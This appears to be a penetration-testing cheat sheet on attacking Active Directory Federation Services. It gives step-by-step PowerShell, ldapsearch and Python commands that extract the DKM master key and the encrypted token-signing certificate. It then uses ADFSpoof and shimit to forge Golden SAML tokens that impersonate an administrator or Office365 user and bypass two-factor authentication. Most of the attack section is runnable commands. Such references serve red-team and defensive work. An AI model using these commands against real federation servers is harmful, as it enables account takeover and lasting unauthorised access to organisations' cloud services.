# Active Directory - Federation Services Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network. ## ADFS - DKM Master Key * The DKM key is stored in the `thumbnailPhoto` attribute of the AD contact object. ```ps1 $key=(Get-ADObject -filter 'ObjectClass -eq "Contact" -and name -ne "CryptoPolicy"' -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local" -Properties thumbnailPhoto).thumbnailPhoto [System.BitConverter]::ToString($key) ``` ## ADFS - Trust Relationship Gets the relying party trusts of the Federation Service. * Search for `IssuanceAuthorizationRules` ```ps1 Get-AdfsRelyingPartyTrust ``` ## ADFS - Golden SAML Golden SAML is a type of attack where an attacker creates a forged SAML (Security Assertion Markup Language) authentication response to impersonate a legitimate user and gain unauthorized access to a service provider. This attack leverages the trust established between the identity provider (IdP) and service provider (SP) in a SAML-based single sign-on (SSO) system. * Golden SAML are effective even when 2FA is enabled. * The token-signing private key is not renewed automatically * Changing a user’s password won't affect the generated SAML **Requirements**: * ADFS service account * The private key (PFX with the decryption password) **Exploitation**: * Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on ADFS server as the **ADFS service account**. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` * Convert PFX and Private Key to binary format ```ps1 # For the pfx echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin # For the private key echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin ``` * Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). ```ps1 mkdir ADFSpoofTools cd $_ git clone https://github.com/dmb2168/cryptography.git git clone https://github.com/mandiant/ADFSpoof.git virtualenv3 venvADFSSpoof source venvADFSSpoof/bin/activate pip install lxml pip install signxml pip uninstall -y cryptography cd cryptography pip install -e . cd ../ADFSpoof pip install -r requirements.txt python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' ``` **Manual Exploitation**: * Retrieve the WID path: `Get-AdfsProperties` * Retrieve the ADFS Relying Party Trusts: `Get-AdfsRelyingPartyTrust` * Retrieve the signing certificate, save the `EncryptedPfx` and decode it `base64 -d adfs.b64 > adfs.bin` ```powershell $cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings" $client= New-Object System.Data.SQLClient.SQLConnection($ConnectionString); $client.Open(); $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT name FROM sys.databases" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $name = $reader.GetString(0) $reader.Close() Write-Output $name; ``` * Retrieve the DKM key stored inside the `thumbnailPhoto` attribute of the Active Directory: ```ps1 ldapsearch -x -H ldap://DC.domain.local -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=DOMAIN,DC=LOCAL" -D "adfs-svc-account@domain.local" -W -s sub "(&(objectClass=contact)(!(name=CryptoPolicy)))" thumbnailPhoto ``` * Convert the retrieved key to raw format: `echo "RETRIEVED_KEY_HERE" | base64 -d > adfs.key` * Use [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) to generate the Golden SAML NOTE: There might be multiple master keys in the container, remember to try them all. **Golden SAML Examples** * SAML2: requires `--endpoint`, `--nameidformat`, `--identifier`, `--nameid` and `--assertions` ```ps1 python ADFSpoof.py -b adfs.bin adfs.key -s adfs.domain.local saml2 --endpoint https://www.contoso.com/adfs/ls /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' ``` * Office365: requires `--upn` and `--objectguid` ```ps1 python3 ADFSpoof.py -b adfs.bin adfs.key -s sts.domain.local o365 --upn user@domain.local --objectguid 712D7BFAE0EB79842D878B8EEEE239D1 ``` * Other: connect to the service provider using a known account, analyze the SAML token attributes given and reuse their format. **NOTE**: Sync the time between the attacker's machine generating the Golden SAML and the ADFS server. Other interesting tools to exploit AD FS: * [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction. * [cyberark/shimit](https://github.com/cyberark/shimit) - A tool that implements the Golden SAML attack ```ps1 python ./shimit.py -idp http://adfs.domain.local/adfs/services/trust -pk key -c cert.pem -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id REDACTED ``` ## References * [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) * [Active Directory Federation Services (ADFS) Distributed Key Manager (DKM) Keys - Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/adfs_dkm_keys.html) * [Exploring the Golden SAML Attack Against ADFS - 7 December 2021](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs) * [Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - Shaked Reiner - 11/21/17](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) * [Meet Silver SAML: Golden SAML in the Cloud - Tomer Nahum and Eric Woodruff - Feb 29, 2024](https://www.semperis.com/blog/meet-silver-saml/)